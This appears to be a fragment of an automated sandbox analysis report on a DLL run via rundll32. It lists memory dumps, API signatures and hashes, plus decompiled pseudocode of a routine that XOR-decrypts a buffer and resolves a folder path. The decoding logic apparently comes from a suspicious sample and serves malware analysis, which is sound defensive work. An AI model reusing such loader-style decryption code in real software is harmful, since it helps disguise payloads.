                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$FreeProcess
                                              • String ID: 0123456789ABCDEF$error
                                              • API String ID: 3859560861-2801526254
                                              • Opcode ID: d159536ed359fb2978bdeb3d8efd08e518805a4ac9e5b7cae6a2cf1678e6ed82
                                              • Instruction ID: 4d37b50957ecb40c11f1bab49c43fdea11f128f3efa604fbc2492665c83ce860
                                              • Opcode Fuzzy Hash: d159536ed359fb2978bdeb3d8efd08e518805a4ac9e5b7cae6a2cf1678e6ed82
                                              • Instruction Fuzzy Hash: 1011B1A6600BC8C5EB92DF51A8103EA77B0EB4CBC5F489165FBC947765EE2CC659C300
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocByteCharMultiProcessWidelstrlen
                                              • String ID:
                                              • API String ID: 1639946962-0
                                              • Opcode ID: 810253122467eff869761211845e8c14e9d73cd99dc7960972147d504be8e0c4
                                              • Instruction ID: f749ba44300ed36f526ff8a462cf25b5487c4517239f32e4156c9a8f9373c5fc
                                              • Opcode Fuzzy Hash: 810253122467eff869761211845e8c14e9d73cd99dc7960972147d504be8e0c4
                                              • Instruction Fuzzy Hash: A101A772505B8982E791CF11F80439AB7A1F78CBD4F088224EB5917798DF3CC6088744
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$Process$AllocFree
                                              • String ID:
                                              • API String ID: 756756679-0
                                              • Opcode ID: 274b2cb4633cd05ef90222c88809d4ff0835cfaf70b1ef21e101df444750c1f5
                                              • Instruction ID: 9806a40fc76e7d2c0d57f827516f40d69531b25457ee03bdfc89f6e60ed63076
                                              • Opcode Fuzzy Hash: 274b2cb4633cd05ef90222c88809d4ff0835cfaf70b1ef21e101df444750c1f5
                                              • Instruction Fuzzy Hash: 99518B72A00B548AEB56CF21E5007DC77B1F70CBE9F088215EE6927B88DF34D6468310
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 27%
                                              			E00000001180002268(void* __ecx, void* __edx, long long __rbx, void* __rcx, signed long long __rdx, long long __rdi, long long __rsi, void* __r8, void* __r11, long long __r14) {
                                              				void* _v8;
                                              				char _v872;
                                              				signed int _v904;
                                              				signed int _v912;
                                              				long long _v920;
                                              				long long _v928;
                                              				long long _v936;
                                              				void* __rbp;
                                              				void* _t101;
                                              				long long _t104;
                                              				intOrPtr _t109;
                                              				void* _t112;
                                              				signed long long _t115;
                                              				long long _t118;
                                              				long long _t119;
                                              				signed int _t120;
                                              				signed long long _t121;
                                              				long long _t124;
                                              				intOrPtr _t125;
                                              				void* _t128;
                                              				void* _t131;
                                              				void* _t132;
                                              				signed long long _t135;
                                              
                                              				_t115 = __rdx;
                                              				_t101 = _t131;
                                              				 *((long long*)(_t101 + 8)) = __rbx;
                                              				 *((long long*)(_t101 + 0x10)) = __rsi;
                                              				 *((long long*)(_t101 + 0x18)) = __rdi;
                                              				 *((long long*)(_t101 + 0x20)) = __r14;
                                              				_t132 = _t131 - 0x3c0;
                                              				r14d =  *((intOrPtr*)(__rcx + 2));
                                              				_t124 = __rcx + 0x2c6;
                                              				E00000001180001F2C(__rbx, __rcx, __rdx, __rdi, _t124, _t101 - 0x2c8, __r8,  &_v872);
                                              				_v912 = _v912 & 0x00000000;
                                              				_t118 = __r14 - 0x10;
                                              				_t112 = _t118 + _t124;
                                              				_v936 = _t124;
                                              				_v920 = _t118;
                                              				_v928 = _t124;
                                              				if (_t112 == 0) goto 0x800022e4;
                                              				asm("movups xmm0, [ecx]");
                                              				_t104 = _t112 - __r14 - _t124;
                                              				asm("movups [esp+eax+0x50], xmm0");
                                              				_t119 = _v920;
                                              				_t125 = _v936;
                                              				r10d = 0;
                                              				if (_t125 == 0) goto 0x800023f3;
                                              				if (_t119 - 4 < 0) goto 0x800023f3;
                                              				_t120 = _t119 + 0xfffffffc;
                                              				_v920 = _t120;
                                              				if (_v928 != 0) goto 0x8000233e;
                                              				if (_t120 == 0) goto 0x800023f3;
                                              				GetProcessHeap();
                                              				_t135 = _t120 + 1;
                                              				HeapAlloc(_t128, ??);
                                              				_v928 = _t104;
                                              				if (_t104 == 0) goto 0x800023f3;
                                              				r10d = 1;
                                              				r9d =  *(_t120 + _t125);
                                              				r11d = 0;
                                              				r9d = r9d ^ _v904;
                                              				_v912 = _t120;
                                              				if (_t120 == 0) goto 0x800023b6;
                                              				r8d = _t115 + 1;
                                              				r8d = r8d & 0x00000003;
                                              				 *(__r11 + _t104) =  *((intOrPtr*)(_t132 + 0x40 + _t135 * 4)) +  *((intOrPtr*)(_t132 + 0x40 + _t115 * 4)) ^  *(__r11 + _t125);
                                              				asm("ror eax, cl");
                                              				 *((intOrPtr*)(_t132 + 0x40 + _t115 * 4)) =  *((intOrPtr*)(_t132 + 0x40 + _t115 * 4)) + 1;
                                              				asm("ror eax, cl");
                                              				 *((intOrPtr*)(_t132 + 0x40 + _t135 * 4)) =  *((intOrPtr*)(_t132 + 0x40 + _t135 * 4)) + 1;
                                              				_t109 = _v928;
                                              				if (__r11 + 1 - _v920 >= 0) goto 0x800023b1;
                                              				goto 0x80002354;
                                              				_t121 = _v912;
                                              				if (_t121 == 0) goto 0x800023d0;
                                              				asm("rol ecx, 0x3");
                                              				if (_t115 + 1 - _t121 < 0) goto 0x800023bf;
                                              				if (r9d == 0 + ( *(_t115 + _t109) & 0x000000ff)) goto 0x80002415;
                                              				if (r10d == 0) goto 0x800023f3;
                                              				if (_t109 == 0) goto 0x800023f3;
                                              				GetProcessHeap();
                                              				HeapFree(??, ??, ??);
                                              				return 0x4000000;
                                              			}

                                              APIs
                                                • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001F5B
                                                • Part of subcall function 0000000180001F2C: SHGetFolderPathA.SHELL32 ref: 0000000180001F79
                                                • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001F8D
                                                • Part of subcall function 0000000180001F2C: lstrcatA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FA8
                                                • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FD4
                                                • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FEE
                                              • GetProcessHeap.KERNEL32 ref: 0000000180002311
                                              • HeapAlloc.KERNEL32 ref: 0000000180002321
                                              • GetProcessHeap.KERNEL32 ref: 00000001800023DF
                                              • HeapFree.KERNEL32 ref: 00000001800023ED
                                                • Part of subcall function 0000000180002B5C: VirtualAlloc.KERNEL32 ref: 0000000180002B85
                                                • Part of subcall function 0000000180002B5C: GetLastError.KERNEL32 ref: 0000000180002B95
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heaplstrcpy$AllocProcess$ErrorFolderFreeLastPathVirtuallstrcat
                                              • String ID:
                                              • API String ID: 2105669568-0
                                              • Opcode ID: b024e13aee0004cfa310f23d42346dd6e876068c5b8baeb37970762a8c3175c9
                                              • Instruction ID: 886363a85c85b8c133f3364473ad3588f921292bdc20cd3c907036740f45d7b5
                                              • Opcode Fuzzy Hash: b024e13aee0004cfa310f23d42346dd6e876068c5b8baeb37970762a8c3175c9
                                              • Instruction Fuzzy Hash: 3351D172614B8486EA96CF14E10479DB3A1F78CBC4F188221EB9957B88DF39D74AC700
                                              Uniqueness

                                              Uniqueness Score: -1.00%